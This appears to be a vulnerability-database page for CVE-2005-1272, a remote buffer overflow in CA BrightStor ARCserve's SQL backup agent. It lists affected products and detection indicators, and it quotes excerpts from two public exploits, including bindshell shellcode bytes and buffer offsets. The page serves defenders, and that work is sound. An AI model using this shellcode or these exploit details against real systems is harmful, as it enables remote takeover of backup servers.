CVE-2005-1272
published 2005-08-05CVE-2005-1272: Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to…
PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
66.12%
99.2th percentile
Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | brightstor_enterprise_backup | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
| ca | brightstor_arcserve_backup | — | — |
| ca | brightstor_arcserve_backup | — | — |
| ca | brightstor_arcserve_backup | — | — |
| ca | brightstor_arcserve_backup | — | — |
| ca | brightstor_arcserve_backup_agent | — | — |
| ca | brightstor_arcserve_backup_agent | — | — |
| ca | brightstor_arcserve_backup_agent | — | — |
| ca | brightstor_arcserve_backup_agent | — | — |
| ca | brightstor_enterprise_backup_agent | — | — |
| ca | brightstor_enterprise_backup_agent | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff
- →Monitor for TCP connections to ports 6070 and 6050 targeting the BrightStor ARCserve SQL Backup Agent (dbasqlr.exe); large payloads (>3000 bytes) sent to these ports are indicative of exploitation attempts. ↗
- →Exploit sends a memory-flush sequence of 0x12000 bytes of 0xFF before the overflow buffer; detect large streams of 0xFF bytes on port 6070 as a pre-exploitation indicator. ↗
- →The exploit buffer is 3288 bytes with the return address overwrite at offset 3168 and a JMP-back stub at offset 3172; network payloads of exactly 3288 bytes to port 6070 should be flagged. ↗
- →The exploit uses a stack-adjustment gadget at offset 1337 in the buffer; look for the byte sequence \x81\xc4\x54\xf2\xff\xff (ADD ESP, -3500) embedded within oversized requests to port 6070. ↗
- →The exploit uses a backward JMP stub \xe9\xd0\xf8\xff\xff at offset 3172 (and \xe9\x4f\xf6\xff\xff in the Metasploit variant); detect these near-end-of-buffer JMP sequences in oversized TCP payloads on port 6070. ↗
- ·The payload bad character restriction is \x00 only; shellcode detection signatures must account for the full byte range except null bytes. ↗
- ·The Metasploit module notes that 'The one line request does not work against Windows 2003', requiring multiple connection attempts with memory-flush pre-requests; detection logic should account for multi-connection exploitation patterns. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2005-1272 CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)
CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)
---
##
# $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor Agent for Microsoft SQL Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was
discovered by cybertronic[at]gmx.net.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2005-1272'],
[ 'OSVDB', '18501' ]
Exploit-DB
CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow
exploitdb·2005-08-03
CVE-2005-1272 CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow
CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow
---
/*
* CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
*
* cybertronic[at]gmx[dot]net
*
*/
#include
#include
#include
#include
#define PORT 6070
unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\
Metasploit
CA BrightStor Agent for Microsoft SQL Overflow
metasploit
CA BrightStor Agent for Microsoft SQL Overflow
CA BrightStor Agent for Microsoft SQL Overflow
This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net.
No writeups or analysis indexed.
http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities&flashstatus=truehttp://www.kb.cert.org/vuls/id/279774http://www.securityfocus.com/bid/14453http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239https://exchange.xforce.ibmcloud.com/vulnerabilities/21656http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities&flashstatus=truehttp://www.kb.cert.org/vuls/id/279774http://www.securityfocus.com/bid/14453http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239https://exchange.xforce.ibmcloud.com/vulnerabilities/21656
2005-08-05
Published